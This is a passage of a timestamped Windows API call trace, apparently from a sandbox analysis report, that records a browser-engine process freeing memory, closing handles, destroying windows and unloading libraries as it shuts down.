0x9f82fc8 [0187.634] memcpy_s (in: _Destination=0x9f82fc8, _DestinationSize=0xa, _Source=0x609b90, _SourceSize=0xa | out: _Destination=0x9f82fc8) returned 0x0 [0187.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0187.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0187.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609ad0 | out: hHeap=0x5e0000) returned 1 [0187.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609b90 | out: hHeap=0x5e0000) returned 1 [0187.637] IUnknown:Release (This=0x5f5f5c) returned 0x2 [0187.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602a40 | out: hHeap=0x5e0000) returned 1 [0187.639] IUnknown:Release (This=0x5f59d4) returned 0x4 [0187.639] LsDestroyContext () returned 0x0 [0187.639] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eeb5a0 | out: hHeap=0x5e0000) returned 1 [0187.639] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8338 | out: hHeap=0x5e0000) returned 1 [0187.639] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bc878 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d82a8 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eebb28 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eebb78 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db310 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eebab0 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eeba60 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eeb858 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eebad8 | out: hHeap=0x5e0000) returned 1 [0187.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64a3a0 | out: hHeap=0x5e0000) returned 1 [0187.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef84b8 | out: hHeap=0x5e0000) returned 1 [0187.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67c2c8 | out: hHeap=0x5e0000) returned 1 [0187.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdcd8 | out: hHeap=0x5e0000) returned 1 [0187.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d0018 | out: hHeap=0x5e0000) returned 1 [0187.641] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bce28 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6896e8 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x686078 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ce208 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb00 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef9e00 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68a700 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x649cf0 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60f2d0 | out: hHeap=0x5e0000) returned 1 [0187.642] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x647bc0 | out: hHeap=0x5e0000) returned 1 [0187.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d180 | out: hHeap=0x5e0000) returned 1 [0187.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62e4d0 | out: hHeap=0x5e0000) returned 1 [0187.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c5c60 | out: hHeap=0x5e0000) returned 1 [0187.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db08 | out: hHeap=0x5e0000) returned 1 [0187.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3f00 | out: hHeap=0x5e0000) returned 1 [0187.644] GetCurrentThreadId () returned 0xb48 [0187.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08000 | out: lpSystemTimeAsFileTime=0xc08000*(dwLowDateTime=0x7671fad0, dwHighDateTime=0x1d7d80b)) [0187.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08010 | out: lpSystemTimeAsFileTime=0xc08010*(dwLowDateTime=0x7671fad0, dwHighDateTime=0x1d7d80b)) [0187.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x76720e1d, dwHighDateTime=0x1d7d80b)) [0187.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x76720e1d, dwHighDateTime=0x1d7d80b)) [0187.646] VirtualFree (lpAddress=0x7580000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.649] VirtualFree (lpAddress=0x7581000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.649] VirtualFree (lpAddress=0x741f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.650] VirtualFree (lpAddress=0x741b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.650] VirtualFree (lpAddress=0x740d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.651] VirtualFree (lpAddress=0x7407000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.651] VirtualFree (lpAddress=0x7411000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.652] VirtualFree (lpAddress=0x740c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.652] VirtualFree (lpAddress=0x7588000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.653] VirtualFree (lpAddress=0x7406000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.653] VirtualFree (lpAddress=0x7587000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.654] VirtualFree (lpAddress=0x7419000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.654] GetTickCount () returned 0x1d796b4 [0187.654] GetTickCount () returned 0x1d796b4 [0187.654] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0187.655] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0187.655] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08028 | out: lpSystemTimeAsFileTime=0xc08028*(dwLowDateTime=0x767394df, dwHighDateTime=0x1d7d80b)) [0187.655] free (_Block=0xc107b0) [0187.655] free (_Block=0xbfff00) [0187.655] free (_Block=0xc105b8) [0187.655] free (_Block=0xc14458) [0187.655] malloc (_Size=0x30) returned 0xc5a7d0 [0187.655] SetEvent (hEvent=0x398) returned 1 [0187.655] SetEvent (hEvent=0x398) returned 1 [0187.655] CloseHandle (hObject=0x3b0) returned 1 [0187.656] CloseHandle (hObject=0x3ac) returned 1 [0187.656] CloseHandle (hObject=0x3a8) returned 1 [0187.656] CloseHandle (hObject=0x3a4) returned 1 [0187.656] free (_Block=0xc0ecb8) [0187.656] VirtualFree (lpAddress=0x75a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.657] free (_Block=0xc14a90) [0187.657] free (_Block=0xc0fcb0) [0187.657] VirtualFree (lpAddress=0x7560000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.657] free (_Block=0xc0fc40) [0187.657] free (_Block=0xbfff90) [0187.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08030 | out: lpSystemTimeAsFileTime=0xc08030*(dwLowDateTime=0x76740a39, dwHighDateTime=0x1d7d80b)) [0187.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x76740a39, dwHighDateTime=0x1d7d80b)) [0187.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x76740a39, dwHighDateTime=0x1d7d80b)) [0187.658] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08048 | out: lpSystemTimeAsFileTime=0xc08048*(dwLowDateTime=0x76740a39, dwHighDateTime=0x1d7d80b)) [0187.658] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08050 | out: lpSystemTimeAsFileTime=0xc08050*(dwLowDateTime=0x76740a39, dwHighDateTime=0x1d7d80b)) [0187.658] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0187.658] IUnknown:Release (This=0x6b50c0) returned 0x0 [0187.659] IUnknown:Release (This=0x6cde08) returned 0x0 [0187.659] IUnknown:Release (This=0xd10de4) returned 0x0 [0187.659] IUnknown:Release (This=0x6e8967bc) returned 0x7ffd [0187.659] CoTaskMemFree (pv=0x602bd0) [0187.659] CoTaskMemFree (pv=0x602c48) [0187.660] GetCurrentThreadId () returned 0xb48 [0187.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08000 | out: lpSystemTimeAsFileTime=0xc08000*(dwLowDateTime=0x7674580e, dwHighDateTime=0x1d7d80b)) [0187.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08010 | out: lpSystemTimeAsFileTime=0xc08010*(dwLowDateTime=0x7674580e, dwHighDateTime=0x1d7d80b)) [0187.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x7674580e, dwHighDateTime=0x1d7d80b)) [0187.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x76746c01, dwHighDateTime=0x1d7d80b)) [0187.660] VirtualFree (lpAddress=0x741c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.661] VirtualFree (lpAddress=0x7410000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.661] VirtualFree (lpAddress=0x741a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.662] VirtualFree (lpAddress=0x7415000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.662] VirtualFree (lpAddress=0x7418000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.662] VirtualFree (lpAddress=0x7417000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.663] VirtualFree (lpAddress=0x740e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.663] VirtualFree (lpAddress=0x7409000, dwSize=0x2000, dwFreeType=0x4000) returned 1 [0187.664] free (_Block=0xc0f230) [0187.664] GetTickCount () returned 0x1d796c4 [0187.664] GetTickCount () returned 0x1d796c4 [0187.664] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0187.664] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0187.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08048 | out: lpSystemTimeAsFileTime=0xc08048*(dwLowDateTime=0x76751bb1, dwHighDateTime=0x1d7d80b)) [0187.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08050 | out: lpSystemTimeAsFileTime=0xc08050*(dwLowDateTime=0x76751bb1, dwHighDateTime=0x1d7d80b)) [0187.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x600f00 | out: hHeap=0x5e0000) returned 1 [0187.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6029c8 | out: hHeap=0x5e0000) returned 1 [0187.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f63a8 | out: hHeap=0x5e0000) returned 1 [0187.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f28a0 | out: hHeap=0x5e0000) returned 1 [0187.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604ba8 | out: hHeap=0x5e0000) returned 1 [0187.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6408 | out: hHeap=0x5e0000) returned 1 [0187.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602c70 | out: hHeap=0x5e0000) returned 1 [0187.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609b78 | out: hHeap=0x5e0000) returned 1 [0187.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd088 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd188 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcfe8 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fce68 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcf28 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fcf68 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd108 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fce28 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fce08 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602b58 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602a68 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602d38 | out: hHeap=0x5e0000) returned 1 [0187.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602ab8 | out: hHeap=0x5e0000) returned 1 [0187.737] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602bf8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x637918 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x637648 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x637738 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x637948 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x687140 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5de8 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5e10 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cedb0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5b90 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604700 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604750 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6047a0 | out: hHeap=0x5e0000) returned 1 [0187.758] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67bbd8 | out: hHeap=0x5e0000) returned 1 [0187.759] IUnknown:Release (This=0x5f0200) returned 0x0 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f60c0 | out: hHeap=0x5e0000) returned 1 [0187.760] UnregisterPowerSettingNotification (Handle=0x60bba8) returned 1 [0187.760] SetWindowLongW (hWnd=0x103bc, nIndex=-21, dwNewLong=0) returned 6297072 [0187.760] DestroyWindow (hWnd=0x103bc) returned 1 [0187.760] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0187.761] NtdllDefWindowProc_W () returned 0x0 [0187.761] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0187.761] NtdllDefWindowProc_W () returned 0x0 [0187.762] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 0 [0187.762] NtdllDefWindowProc_W () returned 0x0 [0187.763] UnregisterClassW (lpClassName=0xc23e, hInstance=0x0) returned 1 [0187.763] UnmapViewOfFile (lpBaseAddress=0x6990000) returned 1 [0187.763] CloseHandle (hObject=0x30c) returned 1 [0187.763] CloseHandle (hObject=0x308) returned 1 [0187.763] GetProcessHeap () returned 0x5e0000 [0187.763] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6015f0 | out: hHeap=0x5e0000) returned 1 [0187.764] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x743f0000 [0187.765] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0187.765] GetProcAddress (hModule=0x743f0000, lpProcName=0xc9) returned 0x744295a0 [0187.766] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fd6c | out: lpflOldProtect=0x19fd6c*=0x4) returned 1 [0187.766] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0187.766] IInternetSession:UnregisterNameSpace (This=0x5fc930, pCF=0x6e784f90, pszProtocol="res") returned 0x0 [0187.767] IUnknown:Release (This=0x6e784f90) returned 0x1 [0187.767] IInternetSession:UnregisterNameSpace (This=0x5fc930, pCF=0x6e784fb0, pszProtocol="about") returned 0x0 [0187.767] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0187.767] IInternetSession:UnregisterNameSpace (This=0x5fc930, pCF=0x6e785fa4, pszProtocol="blob") returned 0x0 [0187.778] IUnknown:AddRef (This=0x6e785fa4) returned 0x1 [0187.778] IUnknown:Release (This=0x5fc930) returned 0x1 [0187.778] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.778] SetEvent (hEvent=0x20c) returned 1 [0187.802] SetThreadPriority (hThread=0x228, nPriority=0) returned 1 [0187.802] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19fd8c*=0x200, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0187.802] SetEvent (hEvent=0x214) returned 1 [0187.804] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19fd74*=0x210, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0187.804] CloseHandle (hObject=0x210) returned 1 [0187.804] CloseHandle (hObject=0x214) returned 1 [0187.804] CloseHandle (hObject=0x218) returned 1 [0187.804] SetEvent (hEvent=0x220) returned 1 [0187.806] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x19fd74*=0x21c, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0187.806] CloseHandle (hObject=0x21c) returned 1 [0187.806] CloseHandle (hObject=0x220) returned 1 [0187.806] CloseHandle (hObject=0x224) returned 1 [0187.806] CloseHandle (hObject=0x208) returned 1 [0187.806] CloseHandle (hObject=0x200) returned 1 [0187.806] CloseHandle (hObject=0x20c) returned 1 [0187.807] CloseHandle (hObject=0x204) returned 1 [0187.807] free (_Block=0xbf7320) [0187.807] CloseHandle (hObject=0x1f4) returned 1 [0187.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5d80 | out: hHeap=0x5e0000) returned 1 [0187.807] CloseHandle (hObject=0x1f0) returned 1 [0187.808] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e64a0 | out: hHeap=0x5e0000) returned 1 [0187.808] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d3058 | out: hHeap=0x5e0000) returned 1 [0187.808] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68f530 | out: hHeap=0x5e0000) returned 1 [0187.808] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2878 | out: hHeap=0x5e0000) returned 1 [0187.809] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8308 | out: hHeap=0x5e0000) returned 1 [0187.809] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604980 | out: hHeap=0x5e0000) returned 1 [0187.809] CoTaskMemFree (pv=0x0) [0187.809] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x5e0000) returned 1 [0187.810] IUnknown:Release (This=0x5f1080) returned 0x0 [0187.810] SetEvent (hEvent=0x304) returned 1 [0187.812] GetCurrentThreadId () returned 0xb48 [0187.813] WaitForSingleObject (hHandle=0x300, dwMilliseconds=0x1388) returned 0x0 [0187.813] GetExitCodeThread (in: hThread=0x300, lpExitCode=0x19fd38 | out: lpExitCode=0x19fd38) returned 1 [0187.813] CloseHandle (hObject=0x304) returned 1 [0187.813] CloseHandle (hObject=0x300) returned 1 [0187.813] DeleteDC (hdc=0x33010a5b) returned 1 [0187.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609148 | out: hHeap=0x5e0000) returned 1 [0187.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604878 | out: hHeap=0x5e0000) returned 1 [0187.822] free (_Block=0xc5fbf0) [0187.822] PeekMessageW (in: lpMsg=0x19fd90, hWnd=0x30316, wMsgFilterMin=0x8003, wMsgFilterMax=0x8003, wRemoveMsg=0x1 | out: lpMsg=0x19fd90) returned 0 [0187.823] GetCurrentThreadId () returned 0xb48 [0187.823] DestroyWindow (hWnd=0x30316) returned 1 [0187.823] NtdllDefWindowProc_W () returned 0x0 [0187.824] NtdllDefWindowProc_W () returned 0x0 [0187.825] NtdllDefWindowProc_W () returned 0x0 [0187.826] NtdllDefWindowProc_W () returned 0x0 [0187.826] NtdllDefWindowProc_W () returned 0x0 [0187.828] DestroyWindow (hWnd=0x203e4) returned 1 [0187.829] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a7f0 | out: hHeap=0x5e0000) returned 1 [0187.829] free (_Block=0xc108d0) [0187.830] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612c58 | out: hHeap=0x5e0000) returned 1 [0187.942] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc840 | out: hHeap=0x5e0000) returned 1 [0187.943] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6123f8 | out: hHeap=0x5e0000) returned 1 [0187.943] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c20 | out: hHeap=0x5e0000) returned 1 [0188.041] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x620bc8 | out: hHeap=0x5e0000) returned 1 [0188.044] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6180 | out: hHeap=0x5e0000) returned 1 [0188.044] IUnknown:Release (This=0xc56be8) returned 0x0 [0188.044] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0188.044] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0188.045] GetProcAddress (hModule=0x76b10000, lpProcName="CoDecrementMTAUsage") returned 0x76e79f00 [0188.045] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fd58 | out: lpflOldProtect=0x19fd58*=0x4) returned 1 [0188.045] CoDecrementMTAUsage (Cookie=0x5f5d60) returned 0x0 [0188.056] SetEvent (hEvent=0x29c) returned 1 [0188.056] GetCurrentThreadId () returned 0xb48 [0188.056] WaitForSingleObject (hHandle=0x2ec, dwMilliseconds=0x1388) returned 0x0 [0188.061] GetExitCodeThread (in: hThread=0x2ec, lpExitCode=0x19fda8 | out: lpExitCode=0x19fda8) returned 1 [0188.061] CloseHandle (hObject=0x29c) returned 1 [0188.061] CloseHandle (hObject=0x2a4) returned 1 [0188.061] CloseHandle (hObject=0x2ec) returned 1 [0188.061] SetEvent (hEvent=0x67c) returned 1 [0188.061] GetCurrentThreadId () returned 0xb48 [0188.062] WaitForSingleObject (hHandle=0x688, dwMilliseconds=0xffffffff) returned 0x0 [0188.068] GetExitCodeThread (in: hThread=0x688, lpExitCode=0x19fd94 | out: lpExitCode=0x19fd94) returned 1 [0188.068] CloseHandle (hObject=0x67c) returned 1 [0188.068] CloseHandle (hObject=0x540) returned 1 [0188.068] IUnknown:Release (This=0x8cea80) returned 0x0 [0188.069] CloseHandle (hObject=0x688) returned 1 [0188.069] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x610430) returned 0x0 [0188.069] ReleaseActCtx (in: hActCtx=0x600474 | out: hActCtx=0x600474) [0188.069] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0188.070] GetProcAddress (hModule=0x70040000, lpProcName="CloseThemeData") returned 0x70063f40 [0188.070] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fd58 | out: lpflOldProtect=0x19fd58*=0x4) returned 1 [0188.070] CloseThemeData () returned 0x0 [0188.070] CloseThemeData () returned 0x0 [0188.071] SetEvent (hEvent=0x310) returned 1 [0188.072] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0xffffffff) returned 0x0 [0188.072] CloseHandle (hObject=0x314) returned 1 [0188.073] CloseHandle (hObject=0x680) returned 1 [0188.073] CloseHandle (hObject=0x678) returned 1 [0188.073] UnmapViewOfFile (lpBaseAddress=0x9610000) returned 1 [0188.073] GetProcessHeap () returned 0x5e0000 [0188.073] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db1a8 | out: hHeap=0x5e0000) returned 1 [0188.073] CloseHandle (hObject=0x330) returned 1 [0188.073] CloseHandle (hObject=0x328) returned 1 [0188.073] UnmapViewOfFile (lpBaseAddress=0x6c20000) returned 1 [0188.073] GetProcessHeap () returned 0x5e0000 [0188.073] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ac88 | out: hHeap=0x5e0000) returned 1 [0188.073] CloseHandle (hObject=0x310) returned 1 [0188.073] GetProcessHeap () returned 0x5e0000 [0188.073] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6135b0 | out: hHeap=0x5e0000) returned 1 [0188.073] FreeLibrary (hLibModule=0x6d6d0000) returned 1 [0188.073] FreeLibrary (hLibModule=0x6d6d0000) returned 1 [0188.073] UnregisterClassW (lpClassName=0xc241, hInstance=0x6d6d0000) returned 1 [0188.074] UnregisterClassW (lpClassName=0xc0f2, hInstance=0x6d6d0000) returned 1 [0188.074] UnregisterClassW (lpClassName=0xc0ef, hInstance=0x6d6d0000) returned 1 [0188.074] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, 